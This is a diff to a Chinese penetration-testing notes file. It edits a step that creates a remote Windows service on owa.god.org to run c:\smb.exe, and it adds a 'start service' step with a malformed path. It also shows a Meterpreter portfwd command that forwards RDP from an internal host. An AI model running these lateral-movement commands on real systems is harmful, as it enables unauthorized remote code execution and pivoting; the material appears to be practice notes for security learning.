--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -206,7 +206,11 @@ https://github.com/AntSwordProject/AntSword-Loader
 
 命令行创建服务
 
-sc\owa.god.org create test binpath="cmd.exe /c c:\smb.exe"
+sc \\owa.god.org create test binpath="cmd.exe /c c:\smb.exe"
+
+开启服务
+
+sc \\\ owa.god.org start test
 
 
 
@@ -245,4 +249,3 @@ portfwd 映射端口
  192.168.1.53 源  目标需要被映射的地址 192.168.1.119 
 
  portfwd   add  -L  192.168.1.53  ‐ l   33389   ‐ r   192.168.1.119   ‐ p 3389
->>>>>>> 2a5e256443feded5bf1324698f76eacc08e5ead2
